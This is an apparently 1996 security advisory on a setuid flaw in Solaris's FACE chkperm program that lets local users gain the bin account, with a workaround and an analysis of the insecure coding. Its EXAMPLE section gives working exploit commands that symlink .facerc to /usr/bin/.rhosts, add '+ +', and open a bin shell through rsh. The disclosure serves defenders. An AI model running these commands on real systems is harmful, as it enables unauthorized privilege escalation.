Solaris chkperm vulnerability

From: Kevin L Prigge (Kevin.L.Prigge-2@tc.umn.edu)
Date: Thu, 5 Dec 1996 12:55:16 -0600 

Problem: Vulnerabilities in /usr/vmsys/bin/chkperm
Platform: Solaris 2.4, 2.5, 2.5.1, other System V derived
          systems with the FACE package installed
Impact:  Local users can overwrite bin owned files with
         zero length files. Local users can create world
         writable bin owned files. Account bin can be
         compromised.
Solution: Remove the suid/sgid bit from the program until
          a patch is available

------------------------------------------------------------------------

PROBLEM DESCRIPTION

Solaris 2.4, 2.5, and 2.5.1 (possibly other versions) have a package
called FACE (Framed Access Command Environment) installed. Included in
the package is a program called chkperm which checks a file to see if
the user has permission to use the FACE interface. This program is
installed suid and sgid bin, and is trivially exploitable to
compromise the bin account.  And in Solaris, which installs many/most
of the system binaries as bin, it may be said that "binliness is next
to rootliness."

The FACE package comes from System V, and may be available under other
SYSV based systems.  We welcome reports of other vulnerable systems.

This vulnerability is believed to be known to the intruder community.

------------------------------------------------------------------------

PLATFORMS AFFECTED

Solaris 2.x, possibly other SYSVR4 derived systems. We welcome
reports of other vulnerable systems.

------------------------------------------------------------------------

IMPACT

Local user can gain system privileges as bin (root follows shortly)

------------------------------------------------------------------------

SUGGESTED WORKAROUND

% chmod ug-s /usr/vmsys/bin/chkperm

------------------------------------------------------------------------

EXAMPLE

% mkdir /tmp/foo
% mkdir /tmp/foo/lib
% chmod -R 777 /tmp/foo
% setenv VMSYS /tmp/foo
% umask 0000
% ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc
% /usr/vmsys/bin/chkperm -l -u foo
% ls -l /usr/bin/.rhosts
-rw-rw-rw-  2 bin      bin            0 Nov 12 09:41 .rhosts
% echo "+ +" >> /usr/bin/.rhosts
% ls -l /usr/bin/.rhosts
-rw-rw-rw-  2 bin      bin            4 Nov 12 09:41 .rhosts
% rsh -l bin localhost /bin/csh -i
Warning: no access to tty; thus no job control in this shell...
% id
uid=2(bin) gid=2(bin)

------------------------------------------------------------------------

DISCUSSION

The program (which resides at /usr/vmsys/bin/chkperm) does several
things in an insecure fashion:

1) It tries to open the file $VMSYS/.facerc and if the file is not
   present it creates it, with zero length, ownership bin.bin

2) The user's UMASK is inherited, so permissions on the newly-created
   .facerc are under the control of an attacker.

3) VMSYS by default is set to /usr/lib, but the program cheerfully
   checks your environment for a different VMSYS base directory, and
   uses that.

4) There is no check made for symbolic links, avoiding the need to
   race.

This exploit is far from original, though it appears to be unpublished
as yet.  Blindly following symlinks, following without checking for
existence or matching ownership, inheriting the user's environment,
are examples of very naive programming wholly inappropriate for a
program installed setuid to a system account.

Sun's practice of shipping their system binaries and binaries
directories owned and writable by bin certainly contributes to making
this exposure more effective and dangerous.

Kevin Prigge   
John Ladwig